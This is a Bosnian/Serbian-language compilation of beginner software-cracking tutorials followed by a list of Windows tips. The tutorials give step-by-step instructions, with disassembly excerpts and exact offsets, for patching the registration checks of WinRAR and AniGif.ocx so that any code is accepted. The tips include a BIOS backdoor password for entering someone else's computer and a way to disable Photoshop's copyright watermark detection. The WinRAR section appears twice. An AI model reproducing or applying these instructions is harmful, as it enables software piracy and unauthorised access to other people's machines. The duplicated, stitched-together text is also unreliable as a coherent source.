Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows
disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je
najbolji za pocetak).To je sve za pocetak.
Sad malo znanja:

Kao sto mozda znate nije lako rukovati sa svim tim asm-codovima i
mislim da mnogi neznaju puno o njima,tako da cu obajsniti najpotrebnije
komande.
Moramo znati da svaka dva broja u asm-codu predstavljaju jedan bajt
(byte).
Broj 73536357 =4 bajta (bytes).75 je jedan bajt (byte) 43 je jedan bajt i
45 je jedan bajt.Sad imamo 4bajta.Ako zelimo da ih promjenimo kasnije
znamo da trebamo promijeniti uvijek dva brooja sa dva druga broja.
Sad par stvari o brojevima koje ces vidjeti kada disassemble exe. fajl.
je (hexadecimala je 74) = jump if equal (skoci ako je jednak)
jne (hexadecimala je 75) = jump if not equal (skoci ako nije jednak)
nop (hexadecimala je 90) =no operation (nema operacija)
call (nema hexadecimale) = call a operation (poziva operaciju)
jmp (nema hexadecimale) = jump to string/operation (skok na operciju)
Ovih pet stvari ce nam trebati za pocetak.

Ok sad cemo pogledati sta oni zapravo rade u asm-codu.
je (jump if equal) skace na neku od operacija ako nadje sta trazi.

Primjer:
Igra treba cd da bi se pokrenula. je "jump if equal" je komanda koja
provjerava ima li cd-a u drive-u.cd je nadjen (equal) i nastavlja se dalje
u asm-codu (jump if equal).
jne (jump if not equal)

Primjer:
Igra treba cd da startuje. jne "jump if not equal" komanda provjerava da
li je cd u drive-u.Ukoliko cd nije u drive-u dobijate poruku koja vas
obavjestava da cd nije u cd drive-u. To je "jump if not equal" ili jne
komanda.
Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer
provjeravanje jel password validan.
Call (call a operation) ova komanda poziva operaciju neku.
jmp (jump to a string/operation) jmp komanda nepoziva komande nego

skace na njih.
Nesto o Zastitnim semama:

Ima puno zastitnih stilova koje ces morati nauciti i nauciti kako ih
provaliti.
Imamo "normalne" cd zastite to jeste passwordom zasticene
programe,igre i
vremenski ogranicene programe.
Najlakse zastitne seme za nas su windows error poruke.
U ovome textu cu pokazati kako da razbijemo windows message boxove
i da crackujemo WinRar sa
W32Dasm verzija 8.9 i sa HIEW-om.
Pocinjemo sa Crackingom:
Kao prvo pocecemo sa WinRAR-om. Otvorite program.
Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred
version)"
Sad cemo kliknuti na "Options"
i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u
prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi
prozorcic koji ce vam reci da je registracija propala.To je sve sto
moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton
Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32
(za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako
promijenis pogresne bajtove)
Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce
prozor i moci ces izabrati fajl koji hoces da disassembliras.
Izabracemo WinRar95.w32.
Sad W32Dasm pocinje disassembling proces.
Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive
znakove nego WINDINGS pisane linije.Ako se ovo desi idite
na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete
izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je
Arial.Sad cete vidjeti asm-code.
Nece vam reci puno jer predpostavljam da neznate sta te sve komande
znace.
Sad pritisnite dugme blizu "print" pod nazivom "strn ref"
Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu
pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste
ukucali pogresan registracijski cod?Rekao je "registration failed"
(REGISTRACIJA PROPALA)
Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na
nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali
pogresan registracijski cod.
Ako ste sve ispravno uradili dobicete na ekranu ovo:
:00413A8F 6A6A push 0000006A
:00413A91 E863640000 call 00419EF9
:00413A96 59 pop ecx
:00413A97 50 push eax
:00413A98 FF7508 push [ebp+08]
*ReferenceTo:USER32.MessageBoxA,Ord:0000h
|
:00413A9B E8120B0100 Call 004245B2
:00413AA0 33C0 xor eax, eax
:00413AA2 A358674200 mov dword ptr [00425758], eax
:00413AAC A34C564200 mov dword ptr [0042564C], eax
:00413AB1 EB56 jmp 00413B09
* Referenced by a (U)nconditional or (C)onditional Jump at Adress:

<---------Ovaj je nas
|:00413A82(C)
|
* P o s s i b l e S t r i n g D a t a R e f f r o m D a t a O b j - > " Wi n R A R
"
:00413AB3 68D86A4200 push 00426AD8

:00413AB8 FF359C644200 push dword ptr [0042649C]
* R e f e r e n c e T o : U S E R 3 2 . S e t Wi n d o wT e x t A , O r d : 0 0 0
0h
:00413ABE E86B0A0100 Call 0042452E
*PossibleReferencetoStringResourceID=00048
:"normal"
:00413AC3 6A30 push 00000030
*PossibleReferencetoDialog:ARCINFODLG,CONT
ROL_ID:006C,""
Asm code ide od vrha na prema dole sve dok ne naidje na kraj coda ili
gresku u codu.To znaci da jne/je komandu moramo promijeniti koja je
negdje gore.
Ali kako cemo znati koja je? Sad mozemo pokusati promijeniti svaku i
vidjeti ili mozemo upotrijebiti "Goto Cd loc" dugme koje se nalazi na
vrhu.Kada kliknemo na njega mali prozor ce se pojaviti.Na desnoj strani
prozora ce se pojaviti text box "Code offset (HEX)" Sada bacimo pogled
na asm-code.Vidjecemo liniju "* Referenced by a (U)nconditional ili
(C)onditional Jump At Adress:" linija pored,na njoj se nalazi adresa koju
moramo znati "|:00413A82 (C)" To je broj koji moramo staviti u cod
lokacijski prozor 00413A82.Na ovoj adresi cemo pronaci "jump" skok
koji ce slati svaki put error poruki kada ukucamo pogresan cod.Kliknite
na Ok u cod lokacijskom prozoru.
Sad smo opet negdje u asm-codu.Bar je na liniji koja nam dopusta da
skacemo na poruke.To je jne (jump if not equal).Bar ce promijeniti svoju
boju u zeleno.Sada pogledaj na kraj ekrana.Tu je linija koja izgleda kao:
34985 Pg 467 of 998 Code Data @:00413A82@Offset00013082h u
Fajlu:Winrar95.w32
Jedna stvar koju moramo zapamtiti je broj poslje @offset.To je
00013082.
Sada idi na HIEW (netrebas zatvarati W32Dasm89) pod HIEW-om otvori
WinRAR95.exe.Klikni na F4 i poslje toga izaberi "decode".Sada mozemo
vidjeti sve te jne/je/eax .. komande i klikni F5.Na vrhi lijevom cosku
mozes staviti @offset broj.
Sad klikni F3.Sad smo u mogucnosti da promijenimo vrijednosti.
Promijeni od 75(jne) na 74 (je) i klikni na F9.Onda klikni F10.
Promijenili smo vrijednosti jne. Sada mozemo isprobati da li
radi.Pokrenucemo program otici do registration ukucati bilo kakav cod ili
ime i sta ce biti?
Pojavice se prozor koji ce vam reci da je registracija uspjesna.
Zapamtite ako zelimo manipulisati exe fajlovima ka Winrar moramo ga
zatvoriti na Windows desktopu ili cemo dobiti poruku "error only read
mode"
Zpamtite osnove.Ako hocemo da cracknemo igru ili aplikaciju pocnite i

uvijek gledajte koje vrste error poruke dobijate.Ako je Windows
messege box mocete je cracknuti sa W32Dasm.Ako je neka druga vrsta
error poruke bolje je da crackirate sa soft-ice debugger-om.
text by CraX0r
Uvod u Svijet Cracking-a
by CraX0r
BIHNET SECURITY
mad_chroniceia@yahoo.com
Uvod:
Sta je Cracking?
Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti
da nije lako
razumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih
razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje
crackinga.
Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete
razumijeti nacin na koji cu neke tacke objasniti.
Korak 1:
Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili
neznaju nista
o ASM-Codu ili o internalnoj funkciji aplikacije.
Potrebni Software:
Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows
disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je
najbolji za pocetak).To je sve za pocetak.
Sad malo znanja:

Kao sto mozda znate nije lako rukovati sa svim tim asm-codovima i
mislim da mnogi neznaju puno o njima,tako da cu obajsniti najpotrebnije
komande.
Moramo znati da svaka dva broja u asm-codu predstavljaju jedan bajt
(byte).
Broj 73536357 =4 bajta (bytes).75 je jedan bajt (byte) 43 je jedan bajt i
45 je jedan bajt.Sad imamo 4bajta.Ako zelimo da ih promjenimo kasnije
znamo da trebamo promijeniti uvijek dva brooja sa dva druga broja.
Sad par stvari o brojevima koje ces vidjeti kada disassemble exe. fajl.
je (hexadecimala je 74) = jump if equal (skoci ako je jednak)
jne (hexadecimala je 75) = jump if not equal (skoci ako nije jednak)
nop (hexadecimala je 90) =no operation (nema operacija)
call (nema hexadecimale) = call a operation (poziva operaciju)
jmp (nema hexadecimale) = jump to string/operation (skok na operciju)
Ovih pet stvari ce nam trebati za pocetak.

Ok sad cemo pogledati sta oni zapravo rade u asm-codu.
je (jump if equal) skace na neku od operacija ako nadje sta trazi.

Primjer:
Igra treba cd da bi se pokrenula. je "jump if equal" je komanda koja
provjerava ima li cd-a u drive-u.cd je nadjen (equal) i nastavlja se dalje
u asm-codu (jump if equal).
jne (jump if not equal)

Primjer:
Igra treba cd da startuje. jne "jump if not equal" komanda provjerava da
li je cd u drive-u.Ukoliko cd nije u drive-u dobijate poruku koja vas
obavjestava da cd nije u cd drive-u. To je "jump if not equal" ili jne
komanda.
Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer
provjeravanje jel password validan.
Call (call a operation) ova komanda poziva operaciju neku.
jmp (jump to a string/operation) jmp komanda nepoziva komande nego

skace na njih.
Nesto o Zastitnim semama:

Ima puno zastitnih stilova koje ces morati nauciti i nauciti kako ih
provaliti.
Imamo "normalne" cd zastite to jeste passwordom zasticene
programe,igre i
vremenski ogranicene programe.
Najlakse zastitne seme za nas su windows error poruke.
U ovome textu cu pokazati kako da razbijemo windows message boxove
i da crackujemo WinRar sa
W32Dasm verzija 8.9 i sa HIEW-om.
Pocinjemo sa Crackingom:
Kao prvo pocecemo sa WinRAR-om. Otvorite program.
Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred
version)"
Sad cemo kliknuti na "Options"
i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u
prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi
prozorcic koji ce vam reci da je registracija propala.To je sve sto
moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton
Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32
(za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako
promijenis pogresne bajtove)
Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce
prozor i moci ces izabrati fajl koji hoces da disassembliras.
Izabracemo WinRar95.w32.
Sad W32Dasm pocinje disassembling proces.
Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive
znakove nego WINDINGS pisane linije.Ako se ovo desi idite
na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete
izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je
Arial.Sad cete vidjeti asm-code.
Nece vam reci puno jer predpostavljam da neznate sta te sve komande
znace.
Sad pritisnite dugme blizu "print" pod nazivom "strn ref"
Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu
pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste
ukucali pogresan registracijski cod?Rekao je "registration failed"
(REGISTRACIJA PROPALA)
Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na
nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali
pogresan registracijski cod.
Ako ste sve ispravno uradili dobicete na ekranu ovo:
:00413A8F 6A6A push 0000006A
:00413A91 E863640000 call 00419EF9
:00413A96 59 pop ecx
:00413A97 50 push eax
:00413A98 FF7508 push [ebp+08]
*ReferenceTo:USER32.MessageBoxA,Ord:0000h
|
:00413A9B E8120B0100 Call 004245B2
:00413AA0 33C0 xor eax, eax
:00413AAC A34C564200 mov dword ptr [0042564C], eax
:00413AB1 EB56 jmp 00413B09
* Referenced by a (U)nconditional or (C)onditional Jump at Adress:

<---------Ovaj je nas
|:00413A82(C)
|
* P o s s i b l e S t r i n g D a t a R e f f r o m D a t a O b j - > " Wi n R A R
"
:00413AB3 68D86A4200 push 00426AD8

:00413AB8 FF359C644200 push dword ptr [0042649C]
* R e f e r e n c e T o : U S E R 3 2 . S e t Wi n d o wT e x t A , O r d : 0 0 0
0h
:00413ABE E86B0A0100 Call 0042452E
*PossibleReferencetoStringResourceID=00048
:"normal"
:00413AC3 6A30 push 00000030
*PossibleReferencetoDialog:ARCINFODLG,CONT
ROL_ID:006C,""
Asm code ide od vrha na prema dole sve dok ne naidje na kraj coda ili
gresku u codu.To znaci da jne/je komandu moramo promijeniti koja je
negdje gore.
Ali kako cemo znati koja je? Sad mozemo pokusati promijeniti svaku i
vidjeti ili mozemo upotrijebiti "Goto Cd loc" dugme koje se nalazi na
vrhu.Kada kliknemo na njega mali prozor ce se pojaviti.Na desnoj strani
prozora ce se pojaviti text box "Code offset (HEX)" Sada bacimo pogled
na asm-code.Vidjecemo liniju "* Referenced by a (U)nconditional ili
(C)onditional Jump At Adress:" linija pored,na njoj se nalazi adresa koju
moramo znati "|:00413A82 (C)" To je broj koji moramo staviti u cod
lokacijski prozor 00413A82.Na ovoj adresi cemo pronaci "jump" skok
koji ce slati svaki put error poruki kada ukucamo pogresan cod.Kliknite
na Ok u cod lokacijskom prozoru.
Sad smo opet negdje u asm-codu.Bar je na liniji koja nam dopusta da
skacemo na poruke.To je jne (jump if not equal).Bar ce promijeniti svoju
boju u zeleno.Sada pogledaj na kraj ekrana.Tu je linija koja izgleda kao:
34985 Pg 467 of 998 Code Data @:00413A82@Offset00013082h u
Fajlu:Winrar95.w32
Jedna stvar koju moramo zapamtiti je broj poslje @offset.To je
00013082.
Sada idi na HIEW (netrebas zatvarati W32Dasm89) pod HIEW-om otvori
WinRAR95.exe.Klikni na F4 i poslje toga izaberi "decode".Sada mozemo
vidjeti sve te jne/je/eax .. komande i klikni F5.Na vrhi lijevom cosku
mozes staviti @offset broj.
Sad klikni F3.Sad smo u mogucnosti da promijenimo vrijednosti.
Promijeni od 75(jne) na 74 (je) i klikni na F9.Onda klikni F10.
Promijenili smo vrijednosti jne. Sada mozemo isprobati da li
radi.Pokrenucemo program otici do registration ukucati bilo kakav cod ili
ime i sta ce biti?
Pojavice se prozor koji ce vam reci da je registracija uspjesna.
Zapamtite ako zelimo manipulisati exe fajlovima ka Winrar moramo ga
zatvoriti na Windows desktopu ili cemo dobiti poruku "error only read
mode"
*-*-*-*-*-*-*-*-*-*-*--- Cracking I dio --*-*-*-*-*-*-*-*-

*-*-*
* Prije nego sto pocnete citati ovaj text, trebate

skinuti 2 programa sa nhs-ac sajta /Cracking/ i to
W32 Dasm i Hex Editor. E takodjer bi trebali da
znate neke osnovne komande i zasta ti programi sluze.
Zato lijepo fino skoknite do NHS-AC sajta i procitajte o tome.
E ako ste sve procitali i shvatili sta uopce zelite, mozemo
poceti.
* AniGif.ocx
Naime, u ovom tutoru cemo cracknuti jedan

fajl koji se nalazi u Visual Basic-u 6. (Samo da znate da sam
sve testirao i da sam ja cracknuo, zato
slobodno mozete nesto pitat ako vam nije jasno).
Fajl se zove AniGif.ocx i nalazi se u Windows\System
direktoriju. Taj fajl sluzi za ubacivanje
GIF animacija u VB6. Medjutim, da bi to mogli morate
se registrovat. Ali mi zelimo to cracknut.
Nije problem, naucit cete :))
Znaci, moramo nekako "ukinut" registraciju.
Ako ste pripremili W32 Dasm, pokrenite ga i
ucitajte fajl AniGif.ocx. Vec sam rekao gdje se nalazi
i za svaki slucaj napravite kopiju tog fajla.
Sada idemo na crack!
* Cracking
Kada ste ucitali fajl u W32 Dasm, trebate uraditi sljedece.

E ako u VB6 pokusamo ubaciti GIF animaciju, prvo se moramo
registrovat kao sto sam rekao. Medjutim ako upisemo
pogresan serijski broj, pokazat ce se poruka:
"The registration info is incorrect."
E sada tu poruku moramo naci u W32 Dasm-u.
Idite na opciju "Stn REF" pogledajte ove male icone
gore na vrhu. E to je druga icona sa desne strane.
Kliknite na nju. Zatim nadjite onu poruku koju smo
malo prije vidjeli. E kada ste je nasli kliknite na nju.
Zatim cemo doci do tog dijela coda. Mi cemo biti na liniji:
:10017320 68BC0A0210 push 1002ABC.
E sada pritisnite tipku PageUp 6 puta!
Onda pogledajte 2 reda iznad i vidjece te ovaj code:
*Referenced by a (U)nconditional or (C)onditional Jump at Address:
:1001715C(C)
Sada moramo otici do jedne lokacije.

Ako ste procitali Cracking na nhs-ac sajtu onda znate sta treba.
Ali ja cu opet pojasnit.
Trebate otici do ove adrese: 1001715C
Pritisnite tipku Shift-12 i upisite: 1001715C
Zatim cete biti prebaceni na ovoj liniji:
:1001715C 7568 jne 100172C6
*-*-*-*-*-*-*--- Cracking II dio --*-*-*-*-*-*-*-

* Ovo je nastavak od I dijela.
Znaci, mi smo nasli adresu koju moramo promijenit.
To je ona adresa koju ste zapisali.
:1001715C 7568 jne 100172C6
Sada (prvo izadjite iz W32 Dasm) i pokrenite
Hex Editor. Ucitajte onaj isti fajl.
Zatim pritisnite tipku F4 i idite na "Decode".
Sada trebate ici na lokaciju :1001715C
Pritisnite F5 i prvo unesite . pa ovaj broj.
To bi izgledalo ovako: .1001715C
E kada ste dosli na tu lokaciju, trebate ono
JNE promijeniti u JE.
Pritisnite F3 i broj 75 promijenite u 74.
Znaci ako ste to uradili, ovako bi trebalo da izgleda:
:1001715C 7468 je 100172C6
Pritisnite tipku F9 i izadjite iz programa (ESC ili F10).
Brraaavvvvooooooo! Upravo ste cracknuli svoj prvi

program. Cestitam. Sada pokrenite VB6, uzmite komponentu
"GIF animation" i naravno, sada ce biti: Unregister :)))))))))
Sada mozete ubacivati svoje GIF animacije :))
------------------------------------------------------------------
*-*-*-*-*--- Windows trikovi ---*-*-*-*-*-
*-*-*-*-*-*
Sada pocnimo sa windows trikovima...jos jedan odlican tutor koji sam

pokusao da odjednom u cugu napisem ali mi se nije dalo...pa sam ga
pisao 2 dana tako sto sam ga sacuvao
Save As My documents Windows trikovi...Stvarno ima puno windows
trikova i vjerujem da ce mi za vrijeme pisanja ovog doca stalno govoriti
nema enough memory traj lejter itd. itd.
(Nadam se da ste primjetili kako mi je dobar engleski).
U nastavku slijedi jos Windows trikova iako ovaj gore nije licio windows
triku, al et...sta je tu je...
Da li ste znali da mozete da stavljate pozadinu kada udjete u svoj

omiljeni
direktorij?
Pa mozete, idite na View > Customize this Folder... i tamo koristite
min
znanje engleskog...
ovaj trik je lakse radjenje Refresha web stranice, tj. pritiskanje F5 da

biste
Refresh web stranicu.
Huh...trebao sam staviti naziv Kompjuterski trikovi...
Da li ste znali?
Da mozete da ukucate rijec u Adres baru i pritiskajuci CTRL+ENTER
kompjuter
automatski dodaje http://www.com na tu Vasu rijec.
Da otprintate trenutnu stranicu pritisnite CTRL+P
Da trazite nesto putem adres bara ukucajte go, find ili ? i onda rijec
koju zelite naci...
Ako zelite da izvucete maksimum iz svog racunara, a vi to neizmerno

zelite, cak sta vise treptite za tim trenutkom, pokusajte provesti u delo
sledecih par saveta:
a) Desni klik na prazan prostor na desktopu i odaberete Properties.
Kliknite na Effects i iskljucite sve opcije koje se nalaze pod Visual
effects. Ovim postupkom ubrzali ste otvaranje menija, pomeranje
prozora, i jos neke druge stvari.
b) Redovno koristite alat za defragmentaciju diska. Nalazi se u Start-
>Programs->Accessories->System Tolls->Disk defragmenter.
Redovnim odrzavanjem diska mozete povecati performanse kompjutera
do 10%.
Kako pristupiti CD-ROM-u u Safe modu? Pre nego sto PC pocne da
bootujeWindows drzite CTRL ili F8 da bi ste pristupili Start meniju.
Izaberite Command Prompt Only i otkucajte
'win/d:m' (bez apostrofa), potvrdite sve sa ENTER.
Jedna od stvari koja moze uzrokovati probleme, narocito na racunarima

sa slabijim grafickim karticama je i kolicina boja sa kojima se vrsi prikaz
slike na monitoru. Preporuka je da ne povecavate kolicinu boja iznad 16
bitne jer ionako necete primetiti razliku (osim ako se ne bavite grafickim
dizajnom) izmedju 16 bitne i 32 bitne kolicine boja, a vasa graficka
kartica bice vam zahvalna i radice sa puno manje napora.
Pojavio vam se virus. Jedna od najlaksih promena sistema na viruse

trojance je da u DOS Prompt-u otkucate netstat-a. Ako u momentu
izvrsenja ove naredbe racunar nije povezan na Internet dobicete prikaz
svih otvorenih port-ova i informaciju da li postoji neki otvoreni port koji
ima status Listening. Ako je broj port-a ispod 1024, velika je
verovatnoca da se radi o nekom sistemskom servisu. Medjutim, ako je
broj port-a koji se prisluskuje iznad 1024 proverite sistem sa nekim anti-
virusnim programom.
Mislim da svako zna za igricu FreeCell koja dolazi uz Windows. Koliko

puta vam se desilo da poludite i vise nego ista pozelite da pobedite pa
makar i na prevaru. Ako pritisnete kombinaciju tastera
CTRL+SHIFT+F10 tokom igre, dobicete meni gde ce vas racunar upitati
da li zelite da pobedite, izgubite ili nastavite da igrate.
Ako ste zaboravili BIOS sifru ili treba da radite sa prijateljevim

racunarom i iz visih i neobjasnjivih razloga morate da cacnete nesto po
njegovoj masini, a on vam (zloca jedna) nije rekao sifru ucinite sledece.
Restartujte racunar sa ukljucenim CAPS LOCK-om. Drzeci Shift taster
otkucajte AWARD-SW
Ovo bi trebalo da vam obezbedi ulaz na sve racunare koji koriste AWARD
BIOS.
Koji je dobar nacin da se zastitite od virusa kada vec nemate neki anti-
virus program? Idite na Start/Find i nadjite sve fajlove sa ekstenzijom
EXE i DLL. Selektujte ih, kliknite desnim dugmetom na njih i izaberite
Properties. Pod Attributes selektujte Read-only i onda na OK. Od sada se
fajlovi sa ekstenzijom EXE i DLL, koji su inace meta virusa, ne mogu
menjati posto se oni, od sada, samo mogu citati ( Read-only). Ovakva
vrsta zastite predstavlja problem za update programe tako da pre nego
sto update-ujete morate iskljuciti Read-only.
Svi znamo da CTRL+A selektuje ceo tekst. Znate li da mozete u MS

Wordu da selektujete sa F8? Pritisnite F8 jedanput da bi ukljucili ovu
mogucnost. Stavite kursor negde na tekst. Pritinsite ponovo F8 i
selektovace se cela rec. Treci put selektovace se cela recenica, cetvrti
put paragraf a peti put ceo dokument. Obrnuti proces sa SHIFT.
Kada zatvorite neku aplikaciju neke biblioteke(DLL) i dalje ostaju
ucitane u memoriji iako ne sluze nicemu. Da bi ste ustedeli memoriju
uradite sledece. Startujte Regedit pa idite do
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Explorer i napravite novi String Value sa
imenom AlwaysUnloadDll i dodelite mu vrednost 1.
Restartujte Windows i uzivajte u cistoj memoriji.
Napomena: ovaj trik bi trebalo da koriste samo oni ljudi koji koriste
obilje razlicitih programa svakodnevno. Onim ostalim ne bih preporucio
ovaj trik jer ce usporiti ucitavanje programa jer ce se biblioteke svaki
put ponovo ucitavati.
Da li vam se desava da ScanDisk posle desetak sekundi pocne ponovo

sve ispocetka da radi? Najbolje resenje je da startujete ScanDisk sa
Windows 98 boot diskete jer tada nema ovakvih simptoma. Takodje,
treba da proverite scandisk.ini koji se nalazi u Windows \ Command
folderu. Namestite NumPasses vrednost na 5 a ScanTimeOut treba da
bude na ON.
Ukoliko zelite da u MS Wordu selektujete samo onaj tekst koji se nalazi u

zamisljenom pravougaoniku kojeg vi definisete, pritisnite zajedno
CTRL+ALT+SHIFT i drzeci levi taster misa opisite granice pravougaonika.
Ovo vam daje mogucnost selektovanja kao u npr. Photoshopu.
Kako preimenovati ikonu Recycle Bin? Startujte Regedit i idite do

HKEY_LOCAL_MACHINE \ Software \ Classes \ CLSID\{645FF040-5081-
101B-9F08 -00AA002F954E} \ ShellFolder. Kliknite dvaaput na
'Attributes' i promenite broj u 50010020. Nakon ovoga dobicete u
meniju komandu Rename
Neki DOS programi kada se startuju iz Explorera samo otvore prozor

DOS prompta i u nedostatku parametra odmah zatvore prozor tako da vi
ne znate sta je pisalo. Jedini lek je da sami odete u DOS prompt i da
otkucate putanju do fajla i onda da ga direktno startujete. Medjutim, taj
odlazak u spomenuti direktorijum moze biti prilicno zamoran jer DOS
skracuje imena direktorijuma i fajlova npr. na
C:\PROGRA~1\SISOFT~1\SPEEDI~1.EXE. Zbog toga je mnogo lakse da
principom Drag&Drop prevucete fajl iz Explorera u DOS prompt i
odmah dobijete kompletnu putanju do fajla i sve sto vam ostaje je da
pritisnete ENTER.
Windows povremeno javlja keyboard overflow problem u keyboard

baferu ili jednostavno cujete pistanje na dodir tastature. Povecajte
buffer tako sto cete otici do HKEY_
LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Kbdclass\Parameters i napravite DWORD value sa imenom
KeyboardDataQueueSize. Vrednost povecajte npr. na 64 hex
Neko vam stalno menja pozadinu Windowsa i to vas nervira? Resenje je

da startujete Regedit i odete do HKEY_ CURRENT_USER \ Software \
Microsoft \ Windows \ CurrentVersion \ Policies \ System. Napravite
DWORD
value: "NoDispBackgroundPage" (bez navodnika) i dodelite mu vrednost
1. Od sada Background opcija u Display Propertiesu nece biti dostupna.
Kako na najlaksi nacin napraviti svoj Screen Saver? Desno dugme na

Desktop pa Properties i onda na Screen Saver. Izaberite '3D Flying
Objects'. Kliknite na Settings pa pod Style odaberite 'Textured Flag'.
Kliknite na 'Texture' i locirajte bilo koju BMP sliku (koja moze biti i npr.
logo vase firme). Otkacite 'Smooth shading' stavite 'Resolution' i 'Size'
na MAX. Kliknite na OK pa na Preview da vidite sta ste uradili
Znate li za opciju Combine and Decode u Outlook Expressu?

Selektujte vise poruka drzeci CRTL ili SHIFT i idite do Message menija i
stavke 'Combine and Decode...'. Dobicte od svih selektovanih poruka
jednu veliku poruku koju npr. mozete da stampate ili nesto slicno.
Ukoliko zelite da startujete starije programe koji nisu pisani za Windows

2000 pogledajte 'Application Compatibility tool' kojeg mozete pronaci na
instalacionom CDu Windowsa 2000 u folderu Support pod nazivom
APCOMPAT.EXE. Ovo vam dodje kao neki emulator Windowsa 95/98 pod
2K
U Windowsu 2000 Profesional Add/Remove stavka vise na sadrzi onoliko

Windows komponeneti, kao pre, koje se mogu deinstalirati. Ima i zato
leka! Skoknite do INF foldera i otvorite SYSOC.INF fajl u Notepadu.
Izbrisete rec HIDE ispred svake stavke i snimite. Od sada Windows "igra
otvorenih karata".
Ukoliko zelite da na najlaksi nacin, bez upotrebe raznih shareware-ova,

prevedete IP broj (npr. 245.84.120.19) u nesto razumljivo i pamtljivo,
idite u DOS i otkucajte NSLOOKUP [IP]
ActiveX plug-inovi mogu biti korisni ali mogu i da zasmetaju. Problem

kod njih je da se ne mogu jednostavno deinstalirati iz Add/Remove
apleta nego jedino rucno. Idite do Windows/ Downloaded Program Files
foldera gde cete naci sve ActiveX plug-inove koje imate instalirane.
Ukoliko neki ne zelite vise na vasem sistemu, kliknite desnim dugmetom
na njega i izaberite Remove. ALI, budite jako pazljivi i radite ovo samo
ako 100% znate sta uklanjate i zasto.
Korisnici Photoshopa od verzije 5 su primetili da prilikom otvaranja

svakog fajla Photoshop odradi 'Detect watermark' koji sluzi nekoj vrsti
zastiti copyrighta. Ukoliko vas nije briga za copyright neke slike ili samo
zelite da ubrzate ucitavanje slike za par sekundi, skoknite do foldera gde
je instaliran Photoshop pa onda udjite u Plugin folder. Sve sto treba da
uradite je da obrisete folder Digimarc ili jos bolje da ga prebacite u neki
drugi folder ukoliko vam kasnije zatreba.
Kako ubrzati startovanje programa? Startujte ga kao 'Minimized'.

Windows nece morati da renderuje prozor i njegov sadrzaj pa ce
program biti brze u statusu 'ready to use'. Medjutim, nemojte ocekivati
da ovom metodom sacuvate memorijske resurse - samo skracujete
brzinu ucitavanja. Ovo je veoma zgodno za programe koji se startuju sa
Windowsom.
Budite obazrivi da kada saljete e-mail, fajl koji ste prikacili (attachment)
povecava se za oko 30% a to nije malo. Treba voditi racuna da kada
narucujete fajlove na email, preko npr. emailfile.com, treba da dodate
ovih 30% na originalnu velicinu fajla. Personal Mailbox na EUnetu je
4MB sto ce reci da max velicina fajla koji moze da vam stigne je oko
3000KB.
Kada sistem pocne sporo da reaguje i sve vam se cini da ce uskoro da

padne, a sebi ne mozete da dozvolite da restartujete sistem uradite
sledece. Pritisnite CTRL+ALT+DEL, oznacite Explorer i kliknite END TASK
dugme. Dobicete poruku "Are you sure you want to exit windows?" a vi
pritisnete ESC i sacekajte par sekundi do sledece poruke "Explorer is not
responding". Kliknite na END TASK i Desktop ce se osveziti. Windows bi
trebao da reaguje bolje jer je ovo neka vrsta pseudo reboota.
Kako pronaci uzrok pada odredjenog programa. Resenje se moze

potraziti sa Dr.Watsonom kojeg dobijate sa Windowsom. Procedura je u
tome da startujete Dr.Watsona i dovedete problematicni program u
stanje pada. Dr.Watson ce to uredno registrovati i snimiti stanje
celokupnog stanja hardvera, softvera, drajvera i operativnog sistema a
na vama je da na osnovu vaseg znanja tumacite log file i zakljucite sta
se desilo.
Kako u Microsoft Wordu napraviti tabelu bez upotrebe misa na najlasi

nacin? Otkucajte samo '+-+' (bez navodnika) i pritisnite ENTER. Eto
tabele! Ukoliko zelite tabelu sa npr. cetiri celije otkucajte '+-++++' (bez
navodnika).
Ukoliko zelite da na najbrzi nacin dodate razmak u meniju Outlook

Expressa 5, dovoljno je samo da drzite SHIFT i da kliknete levim
dugmetom misa na ikonu izpred koje zelite razmak.
Koliko ste puta u browseru videli gresku 404-File not found? Ukoliko
vam je zaista stalo da vidite tu stranicu, stavite URL u clipboard i idite na
sajt http://www.google.com/ i pod pretragom Pastujte problematicni
URL. Google ce pronaci sajt a na vama je da kliknete na Cached link gde
cete videti taj URL iz Googleovog kesa.
